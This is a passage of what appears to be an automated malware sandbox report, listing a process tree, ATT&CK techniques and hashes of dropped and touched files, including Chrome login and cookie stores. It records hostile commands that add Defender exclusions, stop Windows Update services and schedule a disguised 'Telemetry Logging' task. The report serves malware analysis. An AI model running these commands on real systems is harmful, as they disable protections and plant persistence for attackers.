      4⤵
      Executes dropped EXE
      PID:440
    - - C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:3448
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:2804
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2356
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2980
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2180
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4784
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1660
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2584
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:4124

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:3152

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3036

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2924

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2568

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2504

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2372

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2360

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2324

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2256

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2204

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2184

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1992

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1912

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1864

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1652

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1560

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1528

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1512

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1264

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1204

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1164

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1088

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1052
- C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  2⤵
  - Executes dropped EXE
  PID:2648
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4520

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:380

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:64

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3796

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:4136

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3356

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:3536

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER36D5.tmp.csv

Filesize
35KB

MD5
292f4ad1ead30bcebf443eacb4ebeda3

SHA1
1d34db1a19a9589e1bd4392f513bdaa358ce548d

SHA256
46a263b516d17cb873e359d148bd25fb06514047ee2cbeb76ddfc4a1139f0ead

SHA512
b193fcd420cecfbc7ab50603f14d5cb0a95ce0e0d47b40da7c6470d67fe67936c0a892f1e2efc69601d3fc822aaddc6fca645d44a0efac67827ee511e555f5d7

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3705.tmp.txt

Filesize
12KB

MD5
909ecfe3292a8906378c53d8925ae84b

SHA1
073e6794063835cdc0833fdb77ff48d98df589a2

SHA256
9cdb41cf5843c8026ea168350b56d26bd0b19430800f0c63c2a2258d131575be

SHA512
634b5dc2cbd112c07a0acb1cb068df9342a3fb67e6af3580fd78c214fb26213a23b52a2e6ae19a6c0ac80994c5eb3d29130c68d940f825f2afed6b3dea1bb497

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER384E.tmp.csv

Filesize
34KB

MD5
9e023ff1bed97f75cf6f3ab2429d3399

SHA1
ec20f71fdd30fbc35f506e37f4df6d924386bfa2

SHA256
775d3c99b6a44c6b3e2cc720b6c1694555e735fbc818ce9eba9e11e00fb21fee

SHA512
eb910319cd574824af55c5ca285b7e208aa121eefa54dafd8fd0d5effd8e636c557f5bf42f6f1c2495706144a34b3120ceeb50e36844c3f0b3454979f8d71897

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER38BD.tmp.txt

Filesize
12KB

MD5
db468033de5c857229e598c182d17daf

SHA1
4cb3902de71f464a62ab58feb8e8fc49f91c7f08

SHA256
910918f9cf914fbdab2393412b2f8b65ecb984e885c43bd67b5b177dc21e3055

SHA512
61e62c0e3d07591237c5617fcd18585e3c04c15de77e519276dec183449a3b3a8042bb3c3e653b932eda6139c65c775de92032cd81c7cd67bc5e7f199e1e4c11

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002c

Filesize
162KB

MD5
475f3b2f4b6829f089f959d8291c69ab

SHA1
10cfe4b0bad5e7fc4c1bd4c4f79f9cc32ed93c99

SHA256
4f40a7d3b7ddf8e77c9b9556b37cdbc062bda1e20757b4c709adcd3ee624b219

SHA512
fb2b2fb4b86dac393e35c42e66e327af699fa1c6baefdeb4ce9f95298990faed0ad556475d16ba6ad31868412f6179d996cff7c15329f4ef92778be592e9d712

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
a19c62cf53f2a87ff198edf7b3586e91

SHA1
962213a41d172c2f493fa77773617f5b22beb298

SHA256
a21f87c4c704f3d8a7f13ebb3e9439e7c841c2a6c3e52ac02f3fcb94062c4080

SHA512
325898543369dc488e7b1ab0ab10de21bde2816c94f80dc582395443ea56f1ea28c5213edb5b3844e7d43a35575d66603915ad1d4db973c384eafa712d273ee8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
4d52c145ba0627c7f5b621a7e1ef76cc

SHA1
d758fffa8ec47b42e6f238df7ba0d8e5030de356

SHA256
f3d26562cc49c902a6900b390c24d54b052bdff904b01a2859aa981b1438dd15

SHA512
12dfb3ba72958f827d4aa3ad21d0859e07b78fe590a3802544e0cd2b30c70395dc613d831d4c5e3ab492b021d180719a444be6eb63e1420686086ff0d09d262f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
30d125d5ed9b9e62e35159a9e6245c24

SHA1
ee30f584abc2a9e5add9a06c6be3ded505d8b2b8

SHA256
d0e620445c2f8266bde8e92f36ef35cf93e7e30219f53a45fe72960b68ed40d7

SHA512
b67444e36de6e71bfdc7fecd9a978990f8084451ebfa794d1d8067897c4707b2f6a7a5a296341ece5e9a57135e98a7fb14ef2157e2ac75f48e765a08c372c69e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
b27f02151deb8cc7f6b8184172492c81

SHA1
8d992cafd4bfc101d5d2d181bc64702b7e8c820f

SHA256
386ff5dd7fc31bbb2f827e5db141e00e47942ba5e88454de9e0456d7e76fcd22

SHA512
ac0d1e46d622e7565d3bbd3797aca0b3843c882608f9b675300672ceff2e42c5d91384edfc2ffa334b5afa95d74ffd898b1b846dd86d4261989a4587448b60a2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data

Filesize
46KB

MD5
9ee88dd468a9ffc12500d22247e66574

SHA1
64c5beda0f1b243da539e010026ed0f529c61e51

SHA256
be5aace756cb03fc37c38c3f448d7686efed0aa7ed6e59d4f6cac4f73d0d1f6f

SHA512
65e8e2dd0a133346f46591e630790bb567cf5d1aea9c2dfe5747cac43f1ec4108e5c9e8e9655178dfd56d0698a1eae91470fdfbd57638fdc0046e64cb627a499

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Filesize
20KB

MD5
f3567986b7e6c74511056a34752d9098

SHA1
8d53df3fea5044b0aff0ae90b1f25f17b88e4c4b

SHA256
b08ed0067a627a149310cad9c6c3ff4b180f527c24c23f3f3dad07d7aea66e8e

SHA512
768609c712bd0836c52fa213eb8d8382a61d05885ae7417a906e7e47c6f9fc2736f1d37d34a713a03352dffd5d065dabe205810d3564485c67c44909050108c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Filesize
20KB

MD5
264e1035cd224aa3afabf958202d259c

SHA1
f7e31ac320fc4373997fd8d01824070d56d955b4

SHA256
85bde646966c5d653713b24227a3424343873cfba1f2c83e14a2b5c3bdfb9d48

SHA512
c0aefdfe32e21fdf97c7ffd27c81f8b08aded8dd0cd821aec00602ac2b483e14a9a47258636bf35247d7a3801e178d4d6c2f0934aaee9c56bdaa2c1c9151c45f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
0c76bb0a4ae747424cf030d9ca69fe03

SHA1
18b19f2cffb41a8a532b566441bf18504306a860

SHA256
af31329916f88ef89533a6da80c8eb058a2d6a6d248d30efc27132c794266087

SHA512
f8923a96ea0e975ff55a3cd714c80e27b2819ac83ed7af5f4eed8aa1e6cb2138d75223193354054d7be318d75b655271d786aa152ccf1489ccd1df0d9cb82571

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
8b948afe968fdba43970f90b7917adc6

SHA1
1dc9b398a4794eea6f65c13787d7868773bf4a9f

SHA256
82b213889144ea825e708ccb8c07c81219162be582763d0c1ccd1f9a89e05d82

SHA512
9ffc16c6cb433216227a8440d0aca3b1ad44ecc96fb09a6ea7e6a1d6020e1fed626a41b849e7c1b36886ca2e0b924cc55e567b83ca4a7431f83458cd56c5d232

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
5663fbe579ca08e311f5e2b9065b3675

SHA1
229ecab746de0ff7cf0fc7c5c480083b1edf8220

SHA256
72b52a5ac1c3800e60977cc437518e99d47ad9173c6795b35ca7723a4af4875b

SHA512
f931f3e152a38b84246c929423017084a0d27a103b66080e4809fcdfb43b5a7de1e1653636c738578a12686ad683cd59d1e2fea4f9c8f72174947500030dd54a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
873B

MD5
6945dca3cadcf3fb160e1ec72696da37

SHA1
d9db2f7f8f11d2b8169c7f1b1d7bb17adfb8c05d

SHA256
baa797e18bcdd90db2fb62c4864baa9bb07a24259335027b260351f9d49cbf72

SHA512
1da686088875279ad1d25568d44fb3a2b9d18983beaaa6589303ffacc910d6a02bce41fd89a56ca0fe81534b2170cad8819f4e5da4ba02bacec84002633eb779

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
faf68a219bec9d0f44c0b75964b31409

SHA1
b26fe6b4762aa7081d124fbdb7d141ac277229e6

SHA256
6cea980e3c54f7015bdadee8accd7ce2fea02171e43a58916ce24a920a1d345a

SHA512
be544f4da349928312ff0d32d8c28c101c869c7880ba67874316fccb4a90c93b86f5d8b681c286befdab0d003059c5bbf1dd6532f7a92536b6fe035d43a7af64

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\e8ab3b1d-163d-427c-8a81-592f8607bc29.tmp

Filesize
1KB

MD5
c79b4011705f9509d7b5c97fa5309f26

SHA1
17b93bf04dd9939c3b5074c580261b10edfd31bb

SHA256
08859373ca3d1a17ebdf79bd73ed70dabfa579256f893cc0dee9549ead21b9b4

SHA512
c72fe7e3b3351b43fcebc7623d23d5f555a185fa9ece34933f28730cb19be7ea0150d707a95084bac437ede64e633260770b5f3ad1e3610cb368bcba609518db

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
cb600af321d84229d04c5bdfe091d9b3

SHA1
572014237b582d58d911de2ec1e2476b47d84299

SHA256
c0a8bd55e5592339aeb213799d2747ac511ebe25654912f0f26f871607131a42

SHA512
6664523b6d2bbfa4370cd0385f9390fe192e101a1b31117ecd0269c729486f499f1102edbe0f686846f3439e66580cc62c50801462f484482260f6b75f905d3b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
fc4df2dbd4ef235d0df625236be31815

SHA1
8b7392e2cd24e2c2b12f9961b602f65a95ccbb5e

SHA256
f732aaa3c65daf2fc381a860e5ae3284679c03601f4bbddc3996e703dc90a629

SHA512
cefca5c5af9f2f4c7101f0dab4d3314e1c370c293eb1d31b1b64fa636fcf350e99cdadd86ad60ebc474ea613eb9e0705a3700032cf802ede9cd4645de65f8a6d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
93987d82220ebae34c190d392d2a2d97

SHA1
cca436e533935f3e435cb5e1e1996361fbd43bf3

SHA256
25acab0d4ffc13a813fe96e5586061e4fb1f5f6aeeaf2f75bd428f8c64489693

SHA512
46521eba8a67c2cd8c24916b294c61df5dd40a6c269a7406dcce407010dcbbb4d12b45a4a12702b4c81c4cca5faac307105153a730ef5e774f9aec417f28a236

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
cabb2aec8471546b833a5c372af7fafe

SHA1
4209e84910336dd0b88ea989525e2afc69e60ff7

SHA256
b8ffe3c867a49562f6adeafd205279b68e5fe90e96a26315054f4b3c1f34bf76

SHA512
2fd45d20943c4ebc63c2e03afedcbb357c89c9607774658f62249e3a4eeeb4c28e716fe6171f0452c94ac0313e3defd3caed6db40ab973c01f8b111394bfbd99

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
e36acc01e5676dc3695a232a51f60ea1

SHA1
69bef12e77748aa096e24e419db80630b51d0490

SHA256
f492c7626002e44c9b76c7d52b0ce06c9fae9d462f8bb7e553d101e69660118c

SHA512
5776326b1a955be976a7fb6df2c4bad8b7c92837e87b3fd3341aab77e2d621538097793ab014348dbada4639a4a1c1bd8f5a14bb298a0482839edaabf3dcaeb7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
e94c81519a0cf77319d0d4792cb3f860

SHA1
130d269ecdad6d63004cb3df0f98cb221a1dadb5

SHA256
9fc1a530dac568883fcb873dd7fc4b9f9af07f348aedc714fb84f2cff487c605

SHA512
0989400bc939c215d0ed8db7b26755d2a0e5d8fca4649c85c27757cdbb5d3885a38d5deed1dcf788f1d9031d00dd8ee1c6bfeec8b3155e110affdd41ebdeaf98

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57b74a.TMP

Filesize
48B

MD5
e1d87abc48d2a44ebb633493be2bbca4

SHA1
f4bf40b622710c185b10c8988d68e557a0bd55d1

SHA256
2381ef0a04bf58f288e0caa57dc15e042786c0a7ee1138f9247e27f51bcccafb

SHA512
14fa769481322400ea40a23209fe4bbf927b253cbf2520154e4546a8d28af869f5a14af9034dcd4f70abbc32391f9c68e98a977bcd674b2f582d2088a93d03f2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

Filesize
92KB

MD5
254ed183757b83052fa3a8d669302a63

SHA1
1c284c51eb5e98f1586d291ba6e20ded654b515b

SHA256
8137b59167a4422e7f3ab5d0dd38da7f4558f0497e7adbb2fd9498260209f13f

SHA512
163a5a803f4dc63236da3cdfc52281c57d544f1bbaed1fa67a5f35dbf7e0dea728e6c49bab7812d5d6dfb23cb65b593779cb6a6f5d5fc279b13dccfca3560f50

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
33813d5c71c13c7433b11f16213f191b

SHA1
10df32f5a5cde90e6e149c6afebe53f58e4769bc

SHA256
58878e60ede0a3d376848400a73084e1b1a85269f6dae74a60bc7cd8b43b980d

SHA512
007210989acf4e3ec721393a63cd371353ef61bd24ade79cd85186b45a250653fb24a92714ac83460fc0ee2199df6889b115a9f192f4a6818cac0dbf1fc4a44c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
3496f4df56f13879c249173c7e38b236

SHA1
20cb85b61585116d40de30937c4e01e50f111ba5

SHA256
15db120c85fec8b9466bb4f24501f06bf901b78455fc4bbec2c7cc6654a7414d

SHA512
ed04e7f9fff02b222b78ee2ad5a446ef2a7179d1d24e81e2abd7426284d057e04cff6f34e52498d19affc9467f2e57ab62e80dfa99eb2b27f742008211e49cb5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
bb3ae4889a752167645114042e1f1f4f

SHA1
c15fe8b15f36d7c87e034cad7a534fbb46a7176a

SHA256
3c7f62f2b4a57f6f0b45fb28cd6221a3bdbfd6c80eff0f82a30cac1f7996e897

SHA512
b0ba481a560fe54e2b6ddf1bb31ad0236d95bc63b207c9e4db89d3ab847926c06f65069a8bcede6a63746dcd4ed8551d2b254139f5cdcd116d9917c05b94716a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
236760de0694d90a7ba7519683c01238

SHA1
51ed38268880a00fde08787472e3a754b1ac8615

SHA256
2ea8ba03005d82fd0a32949e207f50fa2ba70b1e7b50ae2cc429f170bc7e7bd0

SHA512
416cfb433cdb354f7bd5fe9ddf83cd1ae4c6ac4daab32ca61a1427cd1c9a242872e1ae33367aa61eba65eab8462170d18c16e930899da691a53f8cc91671bd5e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
236760de0694d90a7ba7519683c01238

SHA1
51ed38268880a00fde08787472e3a754b1ac8615

SHA256
2ea8ba03005d82fd0a32949e207f50fa2ba70b1e7b50ae2cc429f170bc7e7bd0

SHA512
416cfb433cdb354f7bd5fe9ddf83cd1ae4c6ac4daab32ca61a1427cd1c9a242872e1ae33367aa61eba65eab8462170d18c16e930899da691a53f8cc91671bd5e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
5453057235850cd906df901f30e0b338

SHA1
84fa60d9c3bf9b4476c90efdc3181748d262768c

SHA256
08d044b5b74348fd3064b9da2cad161b4c211ed21c17c5dc1422013f0aa85c84

SHA512
f5acdcf8400a84fda170a12edc3794a9a5a08204651f51a9a2bbb148c9b54eac711e3343a587b2e41e12d94bce9a603ecb5ff9e3dad2324532468fe94aaacfc6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
5453057235850cd906df901f30e0b338

SHA1
84fa60d9c3bf9b4476c90efdc3181748d262768c

SHA256
08d044b5b74348fd3064b9da2cad161b4c211ed21c17c5dc1422013f0aa85c84

SHA512
f5acdcf8400a84fda170a12edc3794a9a5a08204651f51a9a2bbb148c9b54eac711e3343a587b2e41e12d94bce9a603ecb5ff9e3dad2324532468fe94aaacfc6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
112KB

MD5
7f9018a1b944e7316daaf7fda6829d3c

SHA1
4fa1b4da22a3b015cf00aec3a3eb44964731f43b

SHA256
d068750eb85b311cbba200231e941b9024df9200fcefcb52f145c8629c79a558

SHA512
e1ddd475c98c139adede0eb4c51a0918cc6f0ff15f95d363018643e40f1ff4b8686091b4629e3dc02df4f28cf9bd1a67f23c36278ffbad3bfe2e68d03a00e2d6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
113KB

MD5
8a2fb4967eea7946be08e61d975e6dbe

SHA1
44e4273960a9b8b990d9790c55857bb9ad9bdda7

SHA256
582fa18b380b69f5099deb60030de0101867fe5cdaded0ddca9dfa0510b98eaf

SHA512
5b7ef7ca1192500367802ad296c1bc8ee60a13951a04605f64ba3a75deafd670bdf88d1483ac1f1b646cf32c4d8b116ab6f3ba4546139e3486d21a9bea77e007

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57b44c.TMP

Filesize
109KB

MD5
ee75140e0d10aa2992812e06cb2261ae

SHA1
efed008a6af71ccdc572b973539540572a3595ab

SHA256
aed4042234a442ade0277cc2c2d1800a7a76f609b42f8cf94cd3ba1648890f90

SHA512
7a731e7239260bfbce9268a75967a0575605858a881611b2fd0d3493dae8f6f2dc7f741c9dfd3d2b0eda02c4c73d7688d2a4be02f54d0a68c7f49da9f415962f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AdvancedDefender.exe.log

Filesize
1KB

MD5
ae29b7a843805f722aece191ec9a1c26

SHA1
1be44463fa3fa8d0992fafb8061b617a5eb4eb64

SHA256
df1da27f39fde354f2ab49764b6b3bed10fe9e823bcca5efe360548db3e82de1

SHA512
357281829a54bc24d38337b54ebc5b7bcaca63152a1d84b0cdefed199e7c2183f124f9a29b94fa4f1fd95bd659f335124bf5450a4e0591af885e92d117498cbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
573d77d4e77a445f5db769812a0be865

SHA1
7473d15ef2d3c6894edefd472f411c8e3209a99c

SHA256
5ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c

SHA512
af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\C4Loader.exe.log

Filesize
1KB

MD5
60673033c4ee194b0f7721f69296c7d5

SHA1
f6cfc302a97c2852a986c13d2fd03ac3889243cd

SHA256
8244df3886a534966da7c79a194fe728487d4a0cf65d2a492e2015d5d9c842df

SHA512
db81c5e1fc4fff49d20a90dcf211daa1803bdfbaafbf9938aa313e57a34171b68e9b1d6188a3819ba5f1c75b521abdfb5d25114e3caad8d038a342d14d47ee53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\C4PROLauncher.exe.log

Filesize
1KB

MD5
a044fe2d2b616a7c72de0e3ce2550ed5

SHA1
088e9064a4ce921ea51e2beaaa77ec4a606760ac

SHA256
8c2d0b2637e24bf58fa37278a37976953f7c90234a14b4ac2d9e189aa32f451d

SHA512
76364d966980d7c239efd8e47f431f93fa8dec250b43f3270200f74b7993dde28f6c36674daaa9c728732e93e3b35f54f7ee5efdd094f94c755c3006e7704cd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
48KB

MD5
2cee0e5b52bd8fc3fd7ceef4a661ce66

SHA1
3f6a7c50cf6a2fdbde1bc0ea7de1dff94ee79281

SHA256
122e8318df5a10d975be2b335624b5f371e9a5368d849842eb93d93591695ece

SHA512
b181cc47900738f8fb9f0834fdceaec38413f6b295f85fa025ef653c70bb3f899499744dcfcc1181d8e03986fe36dee20c4c17d484e4de629c066f9af05c4513

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
9f683fc29052ad8d6e5d71cbb4b2fd77

SHA1
